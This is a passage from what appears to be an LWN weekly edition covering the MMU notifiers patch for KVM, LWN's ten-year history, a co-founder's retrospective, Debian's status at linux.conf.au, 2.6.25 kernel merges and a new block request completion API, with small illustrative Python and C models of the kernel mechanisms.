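The intercept, check and mirror sequence can be modeled in a few lines.  This is a toy, with every name in it invented for illustration: real shadow paging involves multi-level tables, permission bits and TLB flushes, none of which appear here.

```python
class ShadowingHost:
    """Toy model of a host shadowing one guest's page table."""

    def __init__(self, guest_to_host_frame):
        # Which guest "physical" frames exist, and where they really live.
        self.guest_to_host_frame = dict(guest_to_host_frame)
        self.guest_table = {}    # what the guest believes is in force
        self.shadow_table = {}   # what the MMU actually uses

    def guest_writes_pte(self, vaddr, guest_frame):
        # The host intercepts the write and checks it for validity...
        if guest_frame not in self.guest_to_host_frame:
            raise PermissionError("guest does not own frame %d" % guest_frame)
        # ...lets the guest's own table change...
        self.guest_table[vaddr] = guest_frame
        # ...and mirrors the change into the real (shadow) table.
        self.shadow_table[vaddr] = self.guest_to_host_frame[guest_frame]


host = ShadowingHost({0: 70, 1: 71})
host.guest_writes_pte(0x1000, 1)
print(host.guest_table, host.shadow_table)
```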


One problem with this technique, as implemented in Linux currently, is that
there is no easy way for the host to feed page table changes back to the
guest.  In particular, if the host system decides that it wants to push a
given page out to swap, it can't tell the guest that the page is no longer
resident.  So virtualization mechanisms like KVM avoid the problem
altogether by pinning pages in memory
when they are mapped in shadow page tables.  That solves the problem, but
it makes it impossible to swap processes running KVM-based virtual machines out of main
memory.


This seems like a good thing to fix.  And a fix exists, in the form of the
MMU notifiers patch posted by
Andrea Arcangeli (from his shiny new Qumranet address).  This patch allows
an interested subsystem to be notified whenever specific memory management
events take place.  The process starts by setting up a set of callbacks:


These callbacks are bundled into an mmu_notifier structure:


The interested code then registers its notifier with:


Here, mm is the mm_struct structure associated with a
given address space.  It is not expected that anybody will be interested in
all memory management events, so notifiers are associated with
specific address spaces.  Once the notifier is in place, the callbacks will
be invoked when interesting things happen:


 release() is called when the relevant mm_struct 
     is about to go away.  So it will be the last callback made to that
     notifier.

 age_page() indicates that the memory management subsystem
     wants to clear the "referenced" flag on the page associated with the
     given address.  This callback should return the previous
     value of the referenced bit, or the closest approximation available on
     the host architecture.

 invalidate_page() and invalidate_range() are both
     ways of telling the guest that the given address(es) are no longer
     valid - the page has been reclaimed.  Upon return from this callback,
     the affected address range should not be referenced by the guest.
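
How the pieces fit together can be seen in a userspace model.  To be clear about what is assumed: only the four callback names come from the patch as described here.  The class names, argument lists and registration method below are invented, and the real kernel interface will differ.

```python
class MMUNotifier:
    """Base class; users override the callbacks they care about."""

    def release(self, mm):
        pass

    def age_page(self, mm, address):
        return False

    def invalidate_page(self, mm, address):
        pass

    def invalidate_range(self, mm, start, end):
        pass


class AddressSpace:
    """Stand-in for an mm_struct carrying its own list of notifiers."""

    def __init__(self):
        self.notifiers = []

    def register(self, notifier):
        self.notifiers.append(notifier)

    def clear_referenced(self, address):
        # Any notifier reporting "referenced" makes the page referenced.
        return any([n.age_page(self, address) for n in self.notifiers])

    def reclaim_page(self, address):
        for n in self.notifiers:
            n.invalidate_page(self, address)

    def reclaim_range(self, start, end):
        for n in self.notifiers:
            n.invalidate_range(self, start, end)

    def teardown(self):
        for n in self.notifiers:
            n.release(self)      # the last callback a notifier sees
        self.notifiers = []


class ShadowTables(MMUNotifier):
    """Hypothetical KVM-like user tracking its own mappings."""

    def __init__(self):
        self.mapped = {}         # address -> referenced flag

    def age_page(self, mm, address):
        previous = self.mapped.get(address, False)
        if address in self.mapped:
            self.mapped[address] = False
        return previous          # the previous value of the referenced bit

    def invalidate_page(self, mm, address):
        self.mapped.pop(address, None)

    def invalidate_range(self, mm, start, end):
        for address in [a for a in self.mapped if start <= a < end]:
            del self.mapped[address]

    def release(self, mm):
        self.mapped.clear()


mm = AddressSpace()
shadow = ShadowTables()
mm.register(shadow)
shadow.mapped[0x1000] = True
mm.reclaim_page(0x1000)          # host swaps the page out
print(shadow.mapped)
```

Since notifiers hang off a single address space, a user like KVM only hears about the guests it is actually running.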


For the curious, the KVM patches
(showing how these notifiers are used there) have also been posted.

While this patch set is aimed at KVM, there has been some interest from
other directions as well - virtual machines are not the only places where
separate (but related) page tables are maintained.  Graphics processing
units on contemporary video cards are an example - they have their own
memory management units and have some interesting management issues of their own.
Remote DMA (RDMA) engines are another possible user.  So these patches have
attracted comments from a few potential users, and have changed
significantly since their first posting.  The discussion is still ongoing,
so further changes may come about before the notifiers find their way into
the mainline.

		Ten-year timeline part 4: the end and the beginning


When your editor started this series, the idea was to have four
installments covering the ten-year life (so far) of LWN.  Well, this is the
fourth installment, and it gets less than halfway there.  This is not, it
seems, a topic which inspires brevity.  So this series will continue past
the anniversary, though your editor anticipates picking up the pace a bit
for the second five years.  There is less to be learned, arguably, by
looking at events in the relatively recent past.


Anyway, at the end of the third installment, LWN had been unacquired
by Tucows and was, once again, on its own.  The worst of the dotcom bust
may have passed, but it was still a somewhat scary environment in which to
be attempting to restart a business.  It was, in fact, even scarier than we
had thought when we so naively set out to show that we could do a better job
of bringing in the cash than Tucows did.


 February 7, 2002: Linus
     tries BitKeeper at last.

 February 14, 2002: Sun
     states that it will "ship a full implementation of the Linux operating
     system."  Dave Whitinger joins LWN.net.


Dave Whitinger was, of course, one of the founders of LinuxToday.  He
joined LWN with the intent of helping us develop the advertising side of
the business.  That did not work out as intended, but it is hardly Dave's
fault; it was a terrible time to be trying to sell advertising.


 February 28, 2002: Sun
     cuts off free access to StarOffice, but we had OpenOffice.org by then
     and didn't mind.  BitKeeper starts to settle in as the kernel's source
     management system.


Linus stuck with BitKeeper after his initial trial, setting a number of
things in motion.  For the next few years, the use of proprietary software
at the core of the kernel development process would be a constant source of
unhappiness and worry - and, in fact, the story had just the sort of
unhappy ending that some observers had feared.  But this was also the move
which rationalized the kernel work flow and made the whole system scale;
the incredible rate of change we see now would not have been possible
without it.  The use of BitKeeper also made the community aware of what
distributed source control could do and, eventually, inspired the creation
of a number of free programs with the same essential features.  One could
say that the community would have eventually developed these systems on its
own without the push from Larry McVoy and BitKeeper, and that's probably
true.  But the fact is: we didn't do it at that time, so we had no real
alternative to BitKeeper.


 March 7, 2002: Martin
     Dalecki's "IDE cleanup" patches start to raise concerns among kernel
     developers, who have this strange notion that their disks should
     actually work.  A petition against the use of BitKeeper circulates on
     the net.  Eric Raymond goes around telling the world that the kernel
     development process is "in crisis."

 March 14, 2002: Richard
     Stallman claims that the GNU HURD will be ready by the end of the
     year.  MandrakeSoft pleads for donations to keep the business alive -
     and LWN does too.  Martin Dalecki officially takes over IDE
     maintenance - and breaks more systems.


We got about $5,000 from our initial plea for donations.  It was a real act
of generosity on the part of our readers, but one does not keep a business
with five employees going for very long with that sort of money.


 March 28, 2002: The
    proposed "consumer broadband and digital television promotion act"
    would require DRM technology in all software which touches digital
    media.  Lineo lays off more staff.

 April 25, 2002: More
    BitKeeper flames.  Lineo goes through a "recapitalization" effort to be
    able to do things like pay its employees.

 May 2, 2002:
    OpenOffice.org 1.0 is released.

 June 6, 2002: LWN switches
    to the "new" site code.  Red Hat applies for a few software patents.
    ADEOS, a real-time system which avoids the RTLinux patent, is
    released.  UnitedLinux launches.  Mozilla 1.0 is released.


It is amazing how many readers hated the new code.  Certainly there were a
lot of silly things in the initial version of the site; we fixed a number
of them in a hurry.  Many readers disliked the ability to post comments -
often posting comments to that effect.  The addition of comments was
something we thought about carefully for a long time; we were quite
concerned that they could ruin the feel of the site.  In the end, it seems,
trusting our readers has paid off; the quality of the conversation here is
often quite good.  

UnitedLinux was a cooperative effort between Caldera, Conectiva,
SuSE, and Turbolinux; the idea was to join together to create a common
base from which each could then craft a separate product.  The effort was
never all that successful, and the presence of Caldera would, of course,
doom it outright in the end.  But it was a big deal at the time.  It is
interesting to see that Mandriva (despite MandrakeSoft's refusal to join
UnitedLinux) and Turbolinux are now attempting a very similar
sort of arrangement.


 June 13, 2002: Secure
    Computing Corporation claims patents on SELinux.  

 June 27, 2002: The 2002
    kernel summit sets October 31 as the date for the 2.6 feature
    freeze.  GNOME 2.0 is released.

 July 4, 2002: Darl McBride
    takes over at SCO.

 July 25, 2002: LWN
     announces "the end of the road."  The "IDE cleanup" patch series (up
     to number 100) causes system lockups and file corruption.  Debian
     GNU/Linux 3.0 ("woody") is released.  Version 1.0 of the Ogg Vorbis
     codec is released.


By the end of July, we had come to realize that the advertising business
was not going to work out for LWN, and we were short of other ideas.  The
bank account had reached a point where we could not pay even very small
expenses. So we
concluded that it was time to throw in the towel and try something else -
though we had no clue of what "something else" might be.  It was with a
heavy heart that we announced our plan to shut down the site.

What happened next is that our donation box, which had sat mostly empty
after the initial announcement, was suddenly topped up to the tune of about
$35,000.  Many of the donations came with notes to the effect of "use this
to throw a big party."  This, shall we say, got our attention.  We decided
that, just maybe, the subscription idea was worth a try after all, and
decided to make a go of it.  It was not the end after all.


 August 1, 2002: A new
     beginning.  HP tries to use the DMCA to shut down disclosure of
     security holes.

 August 15, 2002:
     Distributions from MandrakeSoft, Red Hat, and SuSE are certified to be
     compliant with the Linux Standard Base.


This was when our credit card merchant bank at the time decided that all
those donations might just be fraudulent.  So they seized the money back out
of our bank account.  That, too, got our attention.  It took a few months
and some lawyer time to get the money you all had sent in our direction;
during that time, it was money from PayPal (the subject of everybody else's
horror stories) that kept the lights on while our main source of cash was
blocked.

Needless to say, we got a new merchant bank, which we still use to this
day.  The new bank exhibits a rather higher clue level than the old one
did, but we also learned a valuable lesson: don't mess with the credit card
money pipeline.  Every now and then, somebody asks why we don't accept
pure donations; this is why.  


 August 22, 2002: Martin
     Dalecki quits and the entire series of 115 "IDE cleanup" patches is
     deleted from the 2.5 kernel.

 August 29, 2002: British
     Telecom's attempt to patent the web dies in court.  The BitKeeper
     license changes.  Caldera becomes the SCO Group.

 September 12, 2002: Some
     patches get dropped after Linus starts running his mail through a spam
     filter. 


It's hard to believe that, only 5+ years ago, somebody with an email
address as well distributed as Linus's could get by without spam
filtering.  There are a lot of free "productivity" applications, but,
arguably, few have actually increased productivity to the extent that
SpamAssassin has.


 September 26, 2002: The
     first development 
     release of the "Phoenix" browser is announced.  UnitedLinux upsets the
     community by releasing a closed beta.


Phoenix was the Mozilla Foundation's answer to (relatively) lightweight
browsers like Galeon, which had managed to turn the Gecko engine into
something which was truly usable.  The Phoenix browser proved popular, and
eventually became the tool now known as Firefox.


 October 3, 2002: The
     first subscriber-only weekly edition.  Eldred v. Ashcroft is argued in
     the U.S. Supreme Court.


Eldred v. Ashcroft, argued by Lawrence Lessig, was an attempt to roll back
copyright extension in the US; it was ultimately unsuccessful.  To this
day, there still has not really been a successful challenge to the
extensions to copyright passed over the last few decades - though some
especially nasty attempts to make things even worse were defeated.

With the October 3, 2002 edition, LWN adopted the new policy of requiring
subscriptions in order to read our original content prior to the
publication of the weekly edition.
That policy has stayed essentially unchanged since
then, despite the occasional temptation to increase the subscriber-only
period.  Subscription rates have also stayed unchanged, even though raising
them is also tempting.


Subscriptions have certainly been successful, in that they have kept the
operation going in the years since then.  And there is a real joy
associated with being truly answerable to our readers instead of
advertisers.  Nonetheless, it is a challenging business; people do not like
to pay to read web-based content.  The fact that so many of our readers
are willing to do so is most gratifying.  Trends in other parts of
the net are moving away from this approach, though, with formerly
subscription sites moving to pure advertising models.  So it will be
interesting to see how it all plays out in the future.


Meanwhile, next week's installment will look at how things went for Linux
(and LWN) starting toward the end of 2002.  Stay tuned.

		A ten-year retrospective from LWN's other co-founder


Hello to all LWN readers!  For the tenth anniversary of LWN,
I've been dragged out of my closet to say a few words.  Am I
stunned that LWN is still going after 10 years?  Not really.
Much more stunning to me is the realization that the number
of years LWN has been published without me is now almost double the number
of years it was published with me.  That is much harder to get over.
As a result, all new readers from 2002 on have no reason to
know who I am or what I've written in the past.  For those of
you that remember me and have asked about me, thank you and rest assured 
that I haven't forgotten you either.  

My name is Elizabeth Coolbaugh (Liz) and I was there for the very
first issue as well as many issues that
followed in 1998 through 2001.  I've always said it was the very best
job I ever had.  I wish for all of you, if you haven't experienced it
yet, a job where your first weeks of work are greeted with happy,
enthusiastic letters.  As the years went by, letters of praise, though
much sparser, never totally ceased.  You couldn't have a better
incentive to work harder and harder!

Jon has done an excellent job of going over the history of the first
few years already, so all I can add is some tidbits or personal viewpoints.
I'll mention that for me, the start of LWN was actually back in
the early 1980's, when Jon, Becky and I came together as a programming
team in the then infamous "Assembly Language Programming" class offered
through the Engineering School at CU Boulder.  We got a chance to
experience lots of late nights and interesting hardware experiences, and to
learn how to keep going with pizza, chocolate, caffeine, etc.  That is
a good way to get to know your future business partners.  Jon and Becky
never let me down and we all found different strengths to add to the mix.
Forrest was around, too, though not working with us directly at the time.

Jon mentioned that I was between jobs at the time we began.  In fact,
I had left NCAR three months pregnant.  I loved working at NCAR for
many, many years, but I had always said that I would leave it when the
work stopped being fun.  It actually stopped being fun about two years
before that, but I had weathered rough times before and waited to make
sure the situation wasn't going to turn around before choosing to move
on.  The challenge of a new baby on the way (and the continuing challenge
of the Multiple Sclerosis that eventually led to my departure from LWN)
finally made it "the right time".

So I'd actually had most of a year off to recuperate, re-organize,
have a baby and test the job market waters.  What I wanted was a job
that used my professional skills and yet was part-time, to help me
keep the health I'd regained.  What a pipe-dream!  Companies that
would have gladly recruited me full-time just tossed my resume into
the nearest recycle bin.  The nicer ones told me to go out and find
someone else with identical skills who wanted to job-share a full-time
job and they would be willing to consider the possibility.  Not 
bloody likely.

So when Jon and I were having lunch and he suggested we might be
able to work together to create something giving me what I wanted
and allowing him to eventually leave NCAR, it seemed to be the
right idea at the right time.  I never regretted the decision, but
in fact, I had a full-time working spouse to cushion the decision.
The reaction of my husband, Brandon, to becoming the sole support of the
family and a new father in one fell swoop was a little different
-- much like a deer full-blinded by headlights.

In the spirit of true confessions, though I had fifteen years experience
in the computing field and had worked with many different operating
systems, VMS and Solaris being primary, I'd never actually touched a
Linux system.  Jon's unwavering belief in my ability to pick it all
up in a heartbeat was both daunting and encouraging at the same time.
So I installed my first Linux system only three or four months before
we first started publishing.  It did give me a fresh, unbiased view
of the whole community, though.  Okay, not totally unbiased.  I did
sit on the emacs side of the whole emacs/vi war.

To get started, I subscribed to, say, a hundred different newsgroups
and mailing lists full of people I'd never met, topics I'd never heard
of and flame wars I didn't care to read.  It was truly a new skill to
develop to learn to skim through them searching for the topics people
cared about, the posts that actually carried real information and gently
lift each little kernel of "news" out and place it into the newsletter,
then wait to hear how well I'd done.

The response was totally overwhelming.  I will never, ever forget
the emails we received those first couple of months.  New people were
finding us each week and so the responses kept coming in.  They drove
me to try and make my contributions worthy of the praise they sent.
It is because of those emails that I'm not surprised LWN is still out
there today.  People wanted and needed what we had to offer.  Jon's
vision of what people liked and wanted has always been clear and that
is another important piece of why LWN is still going strong.

My take on the Red Hat Support fiasco:  I have no hard feelings.  
Although my work as a systems administrator had always included supporting
people and I had enjoyed the interaction, I had no idea what I was getting
into offering 24 hour support from my home.  Just as my daughter was
getting old enough to give me a full-night's sleep, I was getting
phone calls at 2am and 3am, having to wake up to a fully alert state
and go into emergency fix-it mode.  I'm surprised I survived until all
the contracts we had sold finally expired.  In the long run, Red Hat's
ideas gave us the courage to start our own business and since writing
for LWN was what I learned to love, I consider the end result to
have worked out for the best.  I also carefully noted for the future
that telephone support work was definitely going to be a last resort
for any future career moves.

Meanwhile, since the few contracts we had didn't bring in enough to
pay the bills, let alone enough to support Jon's full-time entry, I
also did contract work as a technical writer, remote or on-site
administration of Linux for some local companies and I don't even
remember what else.  Eventually, Jon had to take the risk, forgo
waiting for a reliable income and quit his day job in order to
increase the income stream.  Note that his early work on LWN was
always done in addition to continuing his full-time job and trying to
increase our income stream at the same time.  No wonder he got grumpy
if I was out sick or worse, got to head to a fun Linux conference,
leaving him to pick up the slack!  Of course, it was terrifying in
turn for me when the situation reversed and Jon was unavailable.
Picking up the kernel page for the week?  Ack!  I didn't usually
complain.  Instead, I kept my head low, worked hard and hoped not to
see too many corrections or criticisms come in.

It was wonderful for both Jon and me when we were finally able to add
Becky to the mix.  I think initially we were only able to scrape up
enough to pay her for 10 hours a week, but every hour helped.  I haven't
forgotten, Becky (okay, it should be Rebecca, but she'll always be
Becky to me), the hours you put in at a very low rate of pay.  Of course,
we did pay you first -- the downside to being the business owners
for us.

Over the course of the next couple of years, we continued to bring
in our income from other sources.  We did actually initiate putting
some advertising on our site and it brought in a tiny amount of
money, but the bread and butter of the company continued to be contract work
done in addition to the weekly publication.  That included our
most successful side foray, building and teaching Linux classes.

What else did I love about LWN?  I so enjoyed the friendships I made
throughout so many different communities.  Will Rogers once said he
never met a man he didn't like.  Well, I've met many!  But truly,
in all the years I worked for LWN, I never met anyone I didn't like.
Sometimes people I liked said things or did things that I didn't like,
but underneath it, they were all good people, smart, idealistic and
very strongly opinionated.  That was part of what I liked and enjoyed,
so I never held people's opinions against them.

The conferences I attended and at which I spoke were like the
icing on the cake.  I got to meet in-person people I had only
come to know through newsgroups and mailing lists or occasionally
personal correspondence.  I got to meet even more people and
share in the excitement.  And yes, I do remember the late nights
going out for food, drink and conversation with you -- the Atlanta
Showcase, LinuxWorld San Jose, Embedded Systems Conference San Jose, 
LinuxWorld New York, the Colorado Linux Info Quest and 
the Singapore Linux Conference.  Each one provides me with
rich memories.  My trip out to Singapore was one high-point.
So many good and wonderful people and such a wonderful experience.
I thought it was to be the first of many international conferences that
I would be attending and I am still so sad that it was my last.
I particularly regret never making it out to any of the early Linux
conferences in India, despite invitations.

Professionally, though, the highlight of the work was actually
developing myself as a journalist, rather than a computer expert.
I enjoyed researching more in-depth articles.  When rumors
floated my way, I loved actually going out and contacting the
people involved first hand by telephone -- short-circuiting 
email and the rest, to discuss the issues and get their first-hand
viewpoints.  Since our community wasn't exactly hounded by the
media back then, everybody actually wanted to talk to me and was more
than happy to give me the straight scoop, instead of just seeing themselves
misquoted elsewhere the next day, with the resultant flames.
Best of all, I was occasionally
able to get the sources of both sides of a controversy together and
talk.  I can think of at least twice where problems got resolved
as a result, people got together and I got the scoop on a story
the next day that had literally changed as a result of my work.
Very heady stuff.

Jon has already done an excellent job of covering our experience with
the dot-com bubble, so I won't add to his description.  It was truly a
unique life experience that we enjoyed to the fullest, knowing that
another like it was unlikely to come by us again.  We were very
fortunate in our decisions and I agree that the people at Tucows were
extremely good to us.

Well, at this point, all this happened a long time ago.  I had a great
time and regret nothing I did, only the things I didn't get time to
do.  For those who have asked after me personally, be assured that
health-wise, giving up my job was again the right choice at the right
time and I'm doing much, much better than I was in August of 2001.
You're still not likely to see me back any time in the near future.  I
focus my research skills nowadays on tracking traditional and
alternative medical discoveries, implementing what seems good to me
and serving as an ad-hoc resource for other family members.  Oh yes,
and serving as a chauffeur to my daughter, who is now ten years old,
just as LWN is.  Take care, all of you, remember to be proud of what
you are achieving and *always* have fun doing it.  I stand by my
opinion that when work ceases to be fun, it is time for a change.

		LCA: The state of Debian


The Debian miniconf is one of the oldest of linux.conf.au traditions.  This
year, Martin Krafft was the person who - with short notice - got to lead
off this gathering with the "state of Debian" talk.  Debian, as always, is
an active project, and it seems that much is going well.


The Debian security team has grown over the last year.  Martin noted that
Debian, for all practical purposes, had no security support for a period
after the Sarge release.  Those days are over, though, and Debian's security
support is, once again, solid.  There is now good security support for the
testing distribution as well; in fact, testing updates often come out
before those for the stable distribution.  That result comes from the fact
that testing updates do not need to support all architectures and there are
fewer embargo issues.


The upcoming Lenny release, it was noted, will have implemented most of the
features called for in the security-hardening specification.


The state of translations is good; Debian supports 58 languages now, and
may support 77 by the Lenny release.  The Smith Review
Project has 
been working through the package base, ensuring that package descriptions
are, well, descriptive, in proper English, and easily translatable.


On the ports side, the Sparc32 port has been officially retired, to the
dismay of relatively few users.  The Lenny release will include a new port:
Debian GNU/kFreeBSD, which is based on the FreeBSD kernel.  Martin thought
this port would appeal to those Debian users who have been complaining
about the increasing "multimedia orientation" of the Linux-based
distribution.


Much work is going into making the package repository more searchable.  The
debtags project, which is putting a set of standardized tags onto packages,
is relatively advanced.  This effort will address a number of longstanding
problems, like the fact that a search for "image editor" does not turn up
GIMP, which is an "image manipulation program."  Debtags will also make it
possible to search for packages which are related to other packages.  There
is also the apt-xapian-index
project, which is working toward 
indexing all package metadata and providing a fast search capability.


Other bits of current status: 


 The debian-med
     project - building a version of Debian aimed at the  
     medical industry - is headed toward a 1.0 release.

 The Debian mirror network is growing.  There are six new primary
     mirrors, and around 100 new secondary mirrors.

 Lenny will use UTF-8 nearly exclusively.  Developers are working on
     fixing the remaining packages which do not yet support UTF-8.

 The venerable dselect is almost retired.  There are still
     dselect users out there; Martin suggests that all of those
     folks move to aptitude.

 There are a lot of new games coming into the distribution.

 The Etch-and-a-half release will be happening soon.  This is a version
     of Etch which offers a 2.6.24 kernel - needed to make Etch work on
     newer hardware.  The original 2.6.18 kernel will remain an option for
     Etch users.


Looking forward to 2008, Martin noted that the Lenny release is currently
planned for December. Lots of emphasis on "planned" - given Debian's
history in this regard, few people actually expect the release to happen on
time.  Martin did say that things have been getting better in this regard,
with Etch being "only" four months behind schedule.  A Lenny release which
is only a couple months late seems feasible.


Something which is just coming into play is the new "Debian maintainer"
status.  Unlike full developers, maintainers cannot vote, have no access to
the debian-private list, and do not have much access to the wider Debian
infrastructure.  About all they really can do is upload a specific set of
packages.  So the "maintainer" designation is good for those who want to
maintain a small set of packages, but who are not looking to be an active
participant in Debian as a whole, and who do not want to run the "new
maintainer" gauntlet.


Martin was asked whether there was any thought of downgrading any existing
developers to maintainers.  He said that there was some interest in doing
that.  There are currently just over 1000 developers, all of whom have full
access to the repository.  Some 400 of those are inactive, but they still
possess a key which lets them make changes to the system; this is a clear
security issue.  The MIA project
is looking to identify these 
people and, eventually, move them to inactive status.  On the issue of
whether the project would be forcibly downgrading active developers who,
for whatever reason, are not entirely welcome in the community, Martin says
that will not be happening.  There is just no way to do it without bringing
massive disruption and flame wars, and nobody wants that.


There was also a question on the role of the debian-private list.  The
biggest use of debian-private, according to Martin, is vacation
announcements; developers need to let the project know that they will not
be around, but they do not wish to announce their absence to the wider
world.  There are some other discussions there too, of course.  Current
policy says that debian-private discussions will be disclosed after three
years in the absence of a request to the contrary.  There's an effort afoot
to disclose older traffic from before the adoption of that policy, but that
requires the assent of all of the participants.


The debian-women project, unfortunately, is currently stalled; the main
participants have not had the time to push things forward.  The
#debian-women channel remains active, though, and is generally a nice and
supportive place to be.  There are currently about twelve active female
contributors to Debian.  Martin thinks that women are becoming more present
in general, though, and he stated that "the Debian cowboy days are done."


On the packaging front: the packages.qa.debian.org 
site has been redone in "beautiful CSS."  There are now RSS feeds for those
who want to follow the status of specific packages.  A new
"LowThresholdNMU" flag has been added; this is essentially a statement on
the part of the maintainer that he will not get offended if others upload
fixes to the package.  Packages can now use bzip2 compression.  There has
also been a major rework of the shared library infrastructure, which now
looks at actual symbol use when determining shared library dependencies.
This change should make it possible to install individual packages from
testing into a stable system without having to update all of the libraries
that package uses.


There is a growing trend toward team maintenance, especially for the larger
package sets.  This approach increases the robustness of the system and
minimizes problems with MIA maintainers.  


Version control systems are working their way into the Debian
infrastructure.  Packages can now have a set of Vcs-* headers
which point to the upstream source repository; these can be used, for
example, with the debcheckout command to clone the source
repository without having to know anything about the source management
system used.  Version control systems also offer a solution to the current
problem of "hackish packaging tools" being used by many developers.  In the
future, source packages might just include a shallow repository which can
be fed straight to git (or some other system).  This project is stalled at
the moment, but Martin thinks it will go somewhere; it would be nice if the
distributors could come up with a common scheme that they can all use.


The final topic in this session was a question from the audience on whether
Debian might ever go to a shorter release cycle.  The projected 18 months
for Lenny seems like a step in that direction, but 18 months is still quite
a bit longer than the cycles used by many other free distributions.  Martin
thinks that going shorter is unlikely.  The fact of the matter is that
distribution upgrades are a hassle, requiring a fair amount of
administrative attention.  Ubuntu may have made some progress with its use
of upgrade scripts, but the basic problem remains.  On top of that, shorter
release cycles would necessarily lead to a shortening of the time for which
security updates are available for any specific release.  And that, in
turn, would force users into more frequent updates whether they want to do
that or not.  So one should not expect six-month release cycles from Debian
anytime soon.

		What got into 2.6.25


As of this writing, some 3800 patches have been merged into the mainline
git repository since the release of 2.6.24.  That is fewer than one might
have expected, but Linus's travel to linux.conf.au is slowing the process
somewhat.  Expect more than the usual amount of interesting stuff to be
merged relatively late in the merge window period.


User-visible changes include:


 New drivers have been added for Globe Trotter HSDPA wireless cards, 
     HIFN 795x crypto accelerator chips, Xceive xc2028 and xc5000 tuners,
     Cirrus Logic CS5345 analog-to-digital converters, several Beholder TV
     tuners, Syntek DC1125 cameras, Silicon Labs Si470x FM radio receivers, 
     Atmel AT91CAP9 processors, Qualcomm MSM7X00A processors, Marvell Orion
     system-on-a-chip devices, Marvell Feroceon processors, SuperH 7203 and
     7263 processors, SGI IP28 systems, R6040 Ethernet adapters, Broadcom
     NetXtremeII 10Gb network adapters, RTL8180 and 8185-based wireless
     network cards, Microchip ENC28J60 Ethernet chips, and, finally, Atheros-based
     wireless network adapters.

 The Seagate ST-02/Future Domain TMC-8xx and PSI240i SCSI drivers have
     been removed due to lack of interest and maintenance.

 Salsa20 stream cipher support has been added to the crypto layer (at
     least for the x86 architecture - it's an assembly implementation).

 Some realtime work has gone into the scheduler; in particular, the
     kernel will be more aggressive about moving tasks between processors
     when multiple realtime tasks are contending for the same CPU.  The
     implementation of cpusets has been made to work more with the
     scheduler domains mechanism.  The option to make the big kernel lock
     preemptible has been made the default; eventually the non-preemptible
     version will go away altogether.  High-resolution timers can be used
     for preemption, making fair scheduling more accurate.  The group
     scheduling feature has been enhanced with realtime support.

 The preemptible
     read-copy-update patches have been merged.

 Support for the LatencyTop
     utility has been merged.

 Kprobes support for the ARM architecture has been added.

 The new CLONE_IO flag to clone() causes I/O contexts
     (used in the CFQ block I/O scheduler) to be shared with the new child
     process. 

 The idle class for I/O scheduling has been changed to not be 100%
     idle when the device is busy; as a result, it is far less likely to
     cause priority inversion problems and is no longer limited to
     privileged processes.

 A long list of new ext4
     features, including large file support, (very) large filesystem
     support, journal checksumming, multi-block allocation, and more, has
     been added in. 

 The splice() system call now supports TCP receive streams. 

 Controller area network
     protocol support has been merged.

 The network traffic shaper, long obsolete and scheduled for removal,
     is gone.

 Quite a bit of work has been done on the network namespace code which
     was first merged in 2.6.24.  Extending namespace awareness through the
     entire networking subsystem is a big job which is, at this point,
     mostly complete.


Changes visible to kernel developers include:


 Chinese translations of a number of core kernel development 
     documents have been added to the tree.

 There have been a great many changes to the low-level device model
     APIs dealing with kobjects and ksets.  These changes have, in turn,
     forced a large number of adjustments throughout the tree.  See
     Documentation/kobject.txt for an
     overview of the new API.

 There is a new set of security module functions for dealing with
     filesystem mount and unmount operations.

 The chained scatterlist API has been augmented with the sg_table patches.

 There have been some changes to the block request completion API.  See
     this article for a
     description of the new way of doing things.


As of this writing, the merging process has just begun, so expect a long
list again next week.  Among other things, the x86 tree update, with 908
changesets, is waiting in the wings.  There is quite a bit of code yet to
be merged for this development cycle.

		A new block request completion API


The 2.6 block layer has traditionally provided a pair of functions by which
a driver could indicate that an I/O request had been completed.  A call to
end_that_request_first() signaled the transfer of a certain
amount of data and would return a value indicating whether the request as a
whole was complete.  Once all sectors in a request had been transferred, it
was up to the driver to pass the request to
end_that_request_last() for final cleanup.  There was also a
function called simply end_request() which might or might not end
the entire request, depending on how much data had been transferred.  This
API has worked for a long time, but it has occasionally proved confusing
for driver developers.  It was also hard for drivers to communicate useful
error information with this interface.
So, as of 2.6.25, there will be a new way for
drivers to indicate request completion.


After a block driver has transferred one or more sectors (or failed in the
attempt), it should now make a call to blk_end_request(rq, error,
nr_bytes), where rq is the I/O request, error is zero or a negative
error code, and nr_bytes is the number of bytes successfully
transferred.  If blk_end_request() returns zero, the request is
fully processed and the driver can forget about it.  Otherwise there are
still sectors to be transferred and the driver should continue with the
same request.
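
The return convention described above can be modeled in user space.  What follows is only a sketch under stated assumptions: struct mock_request, mock_blk_end_request(), and complete_in_chunks() are invented names standing in for the kernel's structures, and the error handling is deliberately simplified.  It is not the kernel's implementation.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for struct request, reduced to what the sketch needs. */
struct mock_request {
    unsigned int bytes_left;   /* data still to be transferred */
    int error;                 /* last error reported, 0 if none */
    int finished;              /* set once final cleanup has been done */
};

/*
 * Model of the convention in the text: account for nr_bytes, then return
 * zero if the request is fully processed and non-zero if more remains.
 */
int mock_blk_end_request(struct mock_request *rq, int error,
                         unsigned int nr_bytes)
{
    assert(rq != NULL);

    if (error)
        rq->error = error;

    if (nr_bytes >= rq->bytes_left)
        rq->bytes_left = 0;
    else
        rq->bytes_left -= nr_bytes;

    if (rq->bytes_left > 0)
        return 1;       /* still data to transfer; keep the request */

    rq->finished = 1;   /* the real function does its housekeeping here */
    return 0;
}

/*
 * Driver-style loop: report completion in fixed-size chunks until the
 * request is done.  Returns the number of calls made, or -1 if chunk is 0.
 */
int complete_in_chunks(struct mock_request *rq, unsigned int chunk)
{
    int calls = 0;
    int more;

    if (chunk == 0)
        return -1;      /* would never make progress */

    do {
        more = mock_blk_end_request(rq, 0, chunk);
        calls++;
    } while (more);

    return calls;
}
```

A driver following this pattern simply keeps working on the same request for as long as the completion call returns non-zero.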

blk_end_request() must acquire the queue lock to do its job.  If
the driver already holds that lock, it should call
__blk_end_request() instead.

Block drivers traditionally did a number of housekeeping tasks between
calls to end_that_request_first() and
end_that_request_last().  These include calling
add_disk_randomness() to contribute to the entropy pool, returning
any tags used with the request, and removing the request from the queue.
All of that stuff is now done within blk_end_request(), so drivers
can forget about it.  The occasional driver had to carry out other tasks
between the completion of the request and its removal from the queue.  For
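drivers with this kind of special need, there is a separate function to
call, blk_end_request_callback(), which takes a driver-supplied
drv_callback() function as an additional argument.

In this version, drv_callback() will be called (without the queue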
lock held) between the completion of the request and its final cleanup.  If
the callback returns a non-zero value, that final cleanup will not be
done.  This function will always acquire the queue lock - there is no
version for drivers which have already taken that lock.  In general,
